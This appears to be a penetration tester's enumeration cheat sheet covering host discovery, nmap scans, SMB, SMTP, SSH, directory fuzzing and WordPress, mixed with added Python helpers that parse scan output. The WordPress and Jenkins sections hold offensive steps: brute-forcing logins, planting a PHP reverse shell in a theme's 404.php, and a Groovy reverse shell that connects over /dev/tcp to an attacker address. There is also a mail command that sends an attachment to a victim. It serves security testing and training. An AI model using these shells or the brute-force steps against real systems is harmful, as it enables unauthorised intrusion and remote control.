enumeration.md

Enumeration

Host Discovery

Nmap no ping top 50

sudo nmap --top-ports 50 <RANGE> --open -Pn -oA nmap_tcp_top50_hostdiscovery
grep open nmap_tcp_top50_hostdiscovery.gnmap | awk '{print $2}' | sort -u > hosts.txt
# -oA writes .nmap/.gnmap/.xml; the greppable .gnmap file has one host per line, so column 2 is the address
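The grep/awk pipeline above only works because of how the greppable (.gnmap) format lays out each host line. The following is an added example, not part of this cheat sheet: a small Python parser for that format that yields the same hosts.txt list but also keeps the open ports per address (useful for building an asset inventory from the scan). The .gnmap sample it parses is constructed for the example.

```python
"""Parse nmap greppable output (.gnmap) into live hosts and their open ports.

Added example, not part of the original cheat sheet. The sample output
below is constructed; it mirrors what `nmap --top-ports 50 -Pn -oA ...`
writes to the .gnmap file.
"""
import re
from collections import defaultdict

# Constructed .gnmap sample (tabs separate the fields on each host line).
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated Mon Jan  1 10:00:00 2024 as: nmap --top-ports 50 10.0.0.0/29 --open -Pn -oA nmap_tcp_top50_hostdiscovery
Host: 10.0.0.1 ()\tStatus: Up
Host: 10.0.0.1 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///\tIgnored State: closed (48)
Host: 10.0.0.2 ()\tStatus: Up
Host: 10.0.0.2 ()\tPorts: 445/open/tcp//microsoft-ds///, 139/filtered/tcp//netbios-ssn///\tIgnored State: closed (48)
Host: 10.0.0.3 ()\tStatus: Up
Host: 10.0.0.3 ()\tPorts: 3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (49)
# Nmap done at Mon Jan  1 10:00:05 2024 -- 8 IP addresses (3 hosts up) scanned in 5.00 seconds
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)")
# One port entry looks like: <port>/<state>/<proto>//<service>///
PORT_RE = re.compile(r"(\d+)/(\w+)/(tcp|udp)//([^/]*)")


def parse_gnmap(text):
    """Return {ip: [(port, proto, service), ...]} for ports whose state is 'open'."""
    hosts = defaultdict(list)
    for line in text.splitlines():
        if line.startswith("#"):
            continue  # header / timing lines
        m = HOST_RE.match(line)
        if not m or "Ports:" not in line:
            continue  # "Status: Up" lines carry no port data
        ip = m.group(1)
        ports_field = line.split("Ports:", 1)[1]
        for port, state, proto, service in PORT_RE.findall(ports_field):
            if state == "open":
                hosts[ip].append((int(port), proto, service))
    return dict(hosts)


def live_hosts(text):
    """Addresses with at least one open port, sorted numerically (the hosts.txt content)."""
    return sorted(parse_gnmap(text), key=lambda ip: tuple(int(o) for o in ip.split(".")))


if __name__ == "__main__":
    for ip, ports in parse_gnmap(SAMPLE_GNMAP).items():
        print(ip, ", ".join(f"{p}/{proto} {svc}" for p, proto, svc in ports))
    print("hosts.txt:", live_hosts(SAMPLE_GNMAP))
```

Hosts that only answered with filtered ports (10.0.0.3 in the sample) are dropped, exactly as `--open` plus `grep open` would drop them; a host that shows "Status: Up" but no open port never reaches the list.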

NMap ping sweep

sudo nmap -sn <RANGE> -oA nmap_tcp_pingsweep

Netdiscover

sudo netdiscover -r <RANGE>
sudo netdiscover -i <INTERFACE>

Arpscan

sudo arp-scan -l

Services

Most common ports

21: ftp
22: ssh
23: telnet
25: smtp
53: domain name system
80: http
110: pop3
111: rpcbind
135: msrpc
139: netbios-ssn
143: imap
443: https
445: microsoft-ds
993: imaps
995: pop3s
1723: pptp
3306: mysql
3389: ms-wbt-server
5900: vnc
8080: http-proxy

Port scanning Nmap

Full TCP port scan

sudo nmap <TARGET> -sV -sC -O -p- -vv -oA fulltcp_<TARGET> 

Full UDP port scan

sudo nmap <TARGET> -sU -sV -sC -p- -vv -oA fulludp_<TARGET> 

Useful flags

  • -Pn No ping (use if nmap reports the host as down but you know it is up)
  • -sn No port scan (use for a ping sweep)

HTTP Openproxy

If there is an open HTTP proxy, connect to it by configuring a proxy in your browser.

Autorecon

autorecon -vv <IP>

Vulnerability scanning

Nmap scan for vulnerabilities

nmap <TARGET> -p- --script vuln -vv -oA vulnscan_<TARGET> 

SMTP

Enumerate email accounts

nc -nv <IP> 25
VRFY root
VRFY idontexist
nmap -p25 --script smtp-enum-users <IP>

Enumerate SMTP commands

nmap -p25 --script smtp-commands <IP>

nmap all smtp scripts

nmap -p25 --script "*smtp*" <IP>

Sendmail

sendEmail -t <VICTIM MAIL> -f <SENDER MAIL> -s <MAILSERVER IP> -u <TITLE OF MAIL> -a <ATTACHED FILE PATH>

SMB

Get version script

sudo python3 smbver.py <IP> <PORT>

Nmap enumerate SMB shares

nmap -p 139,445 --script=smb-enum-shares.nse,smb-enum-users.nse <IP>
nmap -p 139,445 --script=/usr/share/nmap/scripts/smb* <IP>

Enum4linux

enum4linux <IP>

List shares and check access with null sessions

crackmapexec smb <IP> -u '' -p '' --shares

List shares and check access with username and password

  • use -d <DOMAIN> if the account is a domain account (-d . for a local account)
crackmapexec smb <IP> -u '<USERNAME>' -p '<PASSWORD>' -d . --shares

SMBClient list shares

  • -U takes "<USERNAME>%<PASSWORD>"; leave both sides of the % empty for a null session
smbclient -L <IP> -U "%"

SMBClient connect to share

  • -U takes "<USERNAME>%<PASSWORD>"; leave both sides of the % empty for a null session
smbclient //<IP>/<SHARE> -U "%"

Download smb files (a single file from an smbclient session, or a whole share recursively with smbget)

get <FILE NAME>
smbget -R smb://<IP>/<SHARE>

Nbtscan

nbtscan <IP>

RPC

Nmap enumerate NFS shares via RPC (portmapper on 111)

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <IP>

SSH

Connect with other algorithms (use the algorithm named in the "no matching ... found. Their offer:" error)

ssh <IP>
ssh <IP> -oKexAlgorithms=+<alg from error>
ssh <IP> -oKexAlgorithms=+<alg from error> -c <cipher from error>
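The "<alg from error>" step above depends on reading OpenSSH's "Unable to negotiate ... Their offer: ..." message. The following is an added example, not part of this cheat sheet: it parses that message into the matching -o option and, for the defender's side of the same finding, flags which of the offered algorithms are legacy (SHA-1 key exchange and host keys, CBC ciphers, RC4, DSA). The error strings are constructed but follow OpenSSH's wording; the legacy set is this example's own judgement, not an OpenSSH list.

```python
"""Parse an OpenSSH negotiation failure into the client option needed to
connect, and flag legacy algorithms the server is still offering.

Added example, not part of the original cheat sheet. The messages below
are constructed in the format OpenSSH prints.
"""
import re

# Constructed samples of the client-side error.
SAMPLE_KEX = ("Unable to negotiate with 10.0.0.5 port 22: no matching key exchange "
              "method found. Their offer: diffie-hellman-group1-sha1,diffie-hellman-group14-sha1")
SAMPLE_CIPHER = ("Unable to negotiate with 10.0.0.5 port 22: no matching cipher found. "
                 "Their offer: aes128-cbc,3des-cbc")

# Wording in the error -> ssh option whose list is extended with "+<alg>".
# (-c <cipher>, as used above, is the short form that replaces the Ciphers list.)
KIND_TO_OPTION = {
    "key exchange method": "KexAlgorithms",
    "cipher": "Ciphers",
    "host key type": "HostKeyAlgorithms",
    "MAC": "MACs",
}

# Assumption for this example: algorithms a server should no longer offer.
LEGACY = {
    "diffie-hellman-group1-sha1", "diffie-hellman-group14-sha1",
    "diffie-hellman-group-exchange-sha1",
    "ssh-rsa", "ssh-dss",
    "3des-cbc", "aes128-cbc", "aes192-cbc", "aes256-cbc", "blowfish-cbc",
    "arcfour", "arcfour128", "arcfour256",
    "hmac-md5", "hmac-sha1",
}

ERR_RE = re.compile(
    r"Unable to negotiate with (?P<host>\S+) port (?P<port>\d+): "
    r"no matching (?P<kind>.+?) found\. Their offer: (?P<offer>[\w@.,-]+)"
)


def parse_negotiation_error(msg):
    """Return host, port, the ssh option to extend, the offered list and the
    legacy subset; None if the text is not an OpenSSH negotiation error."""
    m = ERR_RE.search(msg)
    if not m:
        return None
    offer = m.group("offer").split(",")
    return {
        "host": m.group("host"),
        "port": int(m.group("port")),
        "option": KIND_TO_OPTION.get(m.group("kind")),
        "offer": offer,
        "legacy": [a for a in offer if a in LEGACY],
    }


def client_option(msg):
    """The -o argument that appends the server's first offered algorithm to
    the client's list (the '<alg from error>' step), or None if unrecognised."""
    info = parse_negotiation_error(msg)
    if not info or not info["option"]:
        return None
    return f"-o{info['option']}=+{info['offer'][0]}"


if __name__ == "__main__":
    for sample in (SAMPLE_KEX, SAMPLE_CIPHER):
        info = parse_negotiation_error(sample)
        print(f"{info['host']}:{info['port']} offers {info['offer']}")
        print("  connect with:", client_option(sample))
        print("  legacy algorithms to report:", info["legacy"])
```

When every algorithm in the offer lands in the legacy list, the right fix is on the server (restrict KexAlgorithms/Ciphers in sshd_config), not a permanent client-side override.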

Web-applications

  • Check the file extensions in URLs to see what the application is running (.net, .aspx, .php, etc.)
  • Inspect page content
  • Check Firefox debugger for outdated javascript libraries
  • Look for /robots.txt and /sitemap.xml

HTTPS

  • If the webserver is running https, check the certificate for a url/hostname and add it to /etc/hosts

Find subdomains

curl -s <WEBPAGE> -o index.html
grep -o '[^/]*\.<DOMAIN>\.com' index.html | sort -u > subdomains.txt
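The grep pattern above matches anything that ends in the domain name, which also catches look-alike hosts and has an unescaped dot. The following is an added example, not part of this cheat sheet: the same extraction as a Python function that escapes the domain, rejects hosts like notexample.com and example.com.evil.test, and normalises case. The HTML sample is constructed.

```python
"""Extract hostnames belonging to a domain from fetched page content.

Added example, not part of the original cheat sheet. SAMPLE_HTML is a
constructed page; find_subdomains() is the reusable equivalent of
`grep -o '[^/]*\\.<DOMAIN>\\.com' index.html | sort -u`.
"""
import re

SAMPLE_HTML = """\
<html><head>
<link rel="stylesheet" href="https://static.example.com/css/main.css">
<script src="//cdn.Example.com/app.js"></script>
</head><body>
<a href="https://mail.example.com:443/login">Mail</a>
<a href="http://example.com/about">About</a>
<a href="https://dev.api.example.com/v1">API</a>
<a href="https://notexample.com/">Lookalike, must not match</a>
<a href="https://example.com.evil.test/">Suffix trick, must not match</a>
</body></html>
"""


def find_subdomains(html, domain):
    """Return sorted, unique, lower-cased hostnames equal to `domain` or under it."""
    pattern = re.compile(
        # no host character directly before the match (stops "notexample.com")
        r"(?<![A-Za-z0-9.-])"
        # zero or more labels, each followed by a dot
        r"((?:[A-Za-z0-9-]+\.)*"
        + re.escape(domain) +  # the domain itself, with its dots escaped
        # no host character after it (stops "example.com.evil.test")
        r")(?![A-Za-z0-9.-])",
        re.IGNORECASE,
    )
    return sorted({m.group(1).lower() for m in pattern.finditer(html)})


if __name__ == "__main__":
    for host in find_subdomains(SAMPLE_HTML, "example.com"):
        print(host)
```

Ports after the hostname (mail.example.com:443) do not interfere because ":" is not a host character; the bare apex (example.com) is reported too, so it can be filtered out if only subdomains are wanted.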

Screenshot many HTTP pages

Collect screenshots from a list of IPs (one per line; cutycapt needs a full URL, hence the http:// prefix)

for ip in $(cat <IP FILE>); do cutycapt --url=http://$ip --out=$ip.png; done

Run the following bash script

#!/bin/bash
# Bash script to examine the scan results through HTML.
echo "<HTML><BODY><BR>" > web.html
ls -1 *.png | awk -F : '{ print $1":\n<BR><IMG SRC=\""$1""$2"\" width=600><BR>"}' >> web.html
echo "</BODY></HTML>" >> web.html

EyeWitness

./EyeWitness.py -f urls.txt --web

Vulnerability scanning

Nikto

nikto -host <URL> -output nikto-URL.txt

Directory fuzzing

Dirb Quick scan

  • -r to disable recursive scanning (-R asks before recursing into each directory)
  • -p <IP:PORT> to use a proxy
  • -X <.ext1,.ext2> to append each word with these extensions
dirb <URL> /usr/share/dirb/wordlists/big.txt -o dirb-<URL>.txt

Dirb Big wordlist

dirb <URL> /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -o dirb-<URL>.txt

Gobuster Quick scan

  • use the -b flag to blacklist status codes
  • use the -x flag to add file extensions
gobuster dir -w /opt/SecLists/Discovery/Web-Content/big.txt -u <URL> -o gobuster-<URL>.txt

Gobuster Big wordlist

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u <URL> -o gobuster-<URL>.txt

Wordpress

Scan Wordpress

wpscan --url <URL>

Enumerate users

wpscan --url <URL> --enumerate u

Bruteforce login

wpscan --url <URL> --usernames <USERNAME> --passwords /usr/share/wordlists/rockyou.txt --max-threads 50

Upload a reverse shell

  1. Login --> Appearance --> Theme editor --> 404.php
  2. gedit /usr/share/webshells/php/php-reverse-shell.php
  3. Paste in 404.php
  4. Start a listener and browse to a nonexistent page so 404.php is executed

Jenkins

Execute commands

  • After login go to /script

Reverse java shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

General

Find dangerous HTTP methods

https://www.sans.org/reading-room/whitepapers/testing/penetration-testing-web-application-dangerous-http-methods-33945

curl -v -X OPTIONS http://website/directory
# HTTP methods such as PUT and DELETE are dangerous if the server allows them
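The OPTIONS request above returns an Allow header listing what the server says it accepts. The following is an added example, not part of this cheat sheet: it parses the raw response text that `curl -v -X OPTIONS` prints and reports the methods a reviewer would flag (PUT, DELETE, TRACE, CONNECT; the set is this example's choice). Both responses are constructed.

```python
"""Check an HTTP OPTIONS response for methods that should not be enabled.

Added example, not part of the original cheat sheet. The two responses are
constructed to look like what `curl -v -X OPTIONS` shows for a hardened and
a permissive server.
"""
import re

# Methods this example treats as findings when a server advertises them.
RISKY_METHODS = {"PUT", "DELETE", "TRACE", "CONNECT"}

SAMPLE_HARDENED = (
    "HTTP/1.1 204 No Content\r\n"
    "Allow: GET, HEAD, OPTIONS\r\n"
    "Server: nginx\r\n"
    "\r\n"
)
SAMPLE_PERMISSIVE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 01 Jan 2024 10:00:00 GMT\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, POST, PUT, DELETE\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
    "<html>ignored body</html>"
)


def allowed_methods(raw_response):
    """Return the set of methods advertised in Allow (or the older IIS-style
    Public) headers of a raw HTTP response; header names are case-insensitive
    and the header may appear more than once."""
    head = re.split(r"\r?\n\r?\n", raw_response, maxsplit=1)[0]
    methods = set()
    for line in head.splitlines()[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() in ("allow", "public"):
            methods.update(m.strip().upper() for m in value.split(",") if m.strip())
    return methods


def risky_methods(raw_response):
    """Sorted list of advertised methods that are in RISKY_METHODS."""
    return sorted(allowed_methods(raw_response) & RISKY_METHODS)


if __name__ == "__main__":
    for label, resp in (("hardened", SAMPLE_HARDENED), ("permissive", SAMPLE_PERMISSIVE)):
        print(f"{label}: allows {sorted(allowed_methods(resp))}; flagged {risky_methods(resp)}")
```

Allow is only what the server claims: a server can reject a listed method or accept an unlisted one, so a finding here should be confirmed against the server's own configuration (for example an explicit method whitelist in the web server or application framework) rather than taken from the header alone.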